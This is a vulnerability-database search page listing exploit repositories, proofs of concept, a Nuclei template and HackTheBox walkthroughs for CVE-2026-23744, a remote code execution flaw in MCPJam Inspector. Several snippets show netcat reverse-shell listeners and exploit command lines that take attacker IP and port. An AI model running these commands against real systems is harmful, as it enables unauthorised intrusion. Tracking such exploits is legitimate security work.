Lucene search
+L

26 matches found

Kitploit
Kitploit
added 2026/08/31 6:56 a.m.2 views

MCPJam-Inspector-1.4.2-Remote-Code-Execution-CVE-2026-23744

on kali linux - terminal 1 nc -lvnp 4444 on kali linux - terminal 2 python3 ./CVE-2026-23744.py -t http://TARGET.com -p 4444 -i YOUR-KALI-LINUX-IP...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/31 6:11 a.m.5 views

CVE-2026-23744

CVE-2026-23744 python3 CVE-2026-23744.py -u http://devhub.htb:6274 -i 10.10.14.106 -p 4321...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/31 5:38 a.m.5 views

DevHub-HTB-Walkthrough

DevHub – HTB 워크스루 Medium Linux 머신: DevHub 난이도: Medium OS: Linux 주제: CVE-2026-23744, Chisel Tunneling, Jupyter, Flask API, Root 권한 상승 📌 1. 정찰 root@kitploit: nmap -sC -sV devhub.htb 결과: Port 22 SSH Port 80 HTTP Port 6274 MCPJam Inspector 📌 2. Hosts 파일 수정 echo "10.x.x.x devhub.htb" /etc/hosts 📌 3...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/31 5:32 a.m.3 views

mcpExec

mcpExec is a tool that takes advantage of the CVE-2026-23744 to gather a reverse shell using the URL of the vulnerable MCPJam Inspector installation. Installation root@kitploit: git clone https://github.com/daemoncibsec/mcpExec.git cd mcpExec python3 -m venv venv source venv/bin/activate pip...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Nuclei
Nuclei
added 2026/08/31 5:18 a.m.111 views

MCPJam Inspector - Remote Code Execution

MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution RCE vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. id:...

9.8CVSS6.6AI score0.45026EPSS
SaveExploits39References3
Kitploit
Kitploit
added 2026/08/31 5:14 a.m.4 views

CVE-2026-23744

root@kitploit: usage: exploit.py -h --lhost LHOST --lport LPORT --rhost RHOST CVE-2026-23744 - PoC options: -h, --help show this help message and exit --lhost, -l LHOST Attacker IP address --lport, -p LPORT Attacker port --rhost, -t RHOST Target URL...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/31 2:31 a.m.5 views

CVE-2026-23744-exploit

This repository does not have a README...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/30 3:33 p.m.4 views

CVE-2026-23744

This repository does not have a README...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/30 1:31 p.m.4 views

CVE-2026-23744

This repository does not have a README...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/28 6:28 p.m.3 views

CVE-2026-23744-PoC

Este repositorio nao tem um README...

9.8CVSS6.1AI score0.45026EPSS
SaveExploits39
Kitploit
Kitploit
added 2026/08/27 6:40 a.m.4 views

mcpjaminspector-unauth-rce

mcpjaminspector-unauth-rce CVE-2026-23744 RCE in MCPJam inspector = 1.4.2 Details zur Schwachstelle https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 Verwendung root@kitploit: usage: mcpjaminspector-unauth-rce.py -h --target TARGET --command COMMAND options: -h, --help...

9.8CVSS5.8AI score0.45026EPSS
SaveExploits39References1
Kitploit
Kitploit
added 2026/08/27 1:23 a.m.5 views

CVE-2026-23744

CVE-2026-23744 script em python para explorar a CVE-2026-23744 como usar : primeiro, você deve abrir dois terminais primeiro terminal -- nc -nvlp 4444 segundo terminal -- python CVE-2026-23744.py -lhost seu ip -url url alvo para o menu de ajuda : python CVE-2026-23744.py -h...

9.8CVSS5.5AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/07/23 9:31 p.m.76 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

CVE-2026-23744: Unauthenticated Remote Code Execution PoC...

9.8CVSS5.7AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/06/09 1:26 p.m.99 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

MCPJam Inspector Authorized Security Validator A bounded proo...

9.8CVSS6.2AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/06/05 7:27 a.m.105 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

cve-2026...

9.8CVSS5.4AI score0.45026EPSS
SaveExploits39
Packet Storm
Packet Storm
added 2026/06/03 12:00 a.m.115 views

📄 MCPJam Inspector 1.4.2 Command Injection

This is an advanced Python proof of concept for CVE-2026-23744 demonstrating command injection through a vulnerable MCP API endpoint, leading to remote code execution and reverse shell access. The script supports multiple payload types, endpoint discovery, listener management, and several...

9.8CVSS6.6AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/06/02 4:34 a.m.124 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

CVE-2026-23744 --- Description MCPJam inspector is a loca...

9.8CVSS6.6AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/06/01 3:21 a.m.131 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

on kali linux - terminal 1...

9.8CVSS6AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/05/31 5:27 p.m.128 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

CVE-2026-23744 — MCPJam Inspector Unauthenticated RCE !Pytho...

9.8CVSS6AI score0.45026EPSS
SaveExploits39
GithubExploit
GithubExploit
added 2026/05/31 7:39 a.m.307 views

Exploit for Missing Authentication for Critical Function in Mcpjam Inspector

HackTheBox — DevHub CVE-2026-23744 | MCPJam Inspector Unaut...

9.8CVSS6AI score0.45026EPSS
SaveExploits39
Rows per page
Query Builder